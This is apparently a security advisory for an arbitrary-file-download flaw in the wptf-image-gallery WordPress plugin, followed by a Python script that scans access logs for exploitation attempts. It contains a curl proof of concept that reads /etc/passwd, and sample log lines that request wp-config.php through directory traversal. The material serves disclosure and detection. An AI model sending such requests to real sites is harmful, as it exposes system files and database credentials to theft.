The plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajax_load.php code does not sanitize user input or check that the requesting user is authorized to download files. This allows an unauthenticated user to download sensitive system files with a single request, for example:

```sh
$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
```
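As an added example (not code from the original advisory or the plugin), the following Python scans web-server access log lines for requests to the vulnerable ajax_load.php endpoint whose url parameter is an absolute path, contains directory traversal, or lies outside the plugin's expected upload directory. The log lines, IP addresses and the wp-content/uploads/ allowlist are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88.1"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3021 "-" "curl/7.88.1"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_ENDPOINT = "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"
# Assumption: a gallery plugin should only ever serve files from the uploads tree.
ALLOWED_PREFIX = "wp-content/uploads/"


def suspicious_url_param(value):
    """Return a reason string if the url= value looks like an arbitrary-file-read attempt, else None."""
    decoded = unquote(value)  # one extra decode pass catches double-encoded traversal
    normalized = decoded.replace("\\", "/")
    if normalized.startswith("/"):
        return "absolute path"
    if ".." in normalized.split("/"):
        return "directory traversal"
    if not normalized.startswith(ALLOWED_PREFIX):
        return "outside uploads directory"
    return None


def scan_access_log(log_text):
    """Return (client_ip, reason, decoded_url_value) for each suspect request to the vulnerable endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        if parts.path != VULN_ENDPOINT:
            continue  # only the vulnerable handler is of interest
        for value in parse_qs(parts.query).get("url", []):  # parse_qs already decodes once
            reason = suspicious_url_param(value)
            if reason:
                findings.append((m.group("ip"), reason, unquote(value)))
    return findings


if __name__ == "__main__":
    for ip, reason, path in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{path}")
```

Run against the constructed log, the scan flags the two requests from 203.0.113.5 and leaves the legitimate gallery image request alone.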
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wptf-image-gallery | eq | * |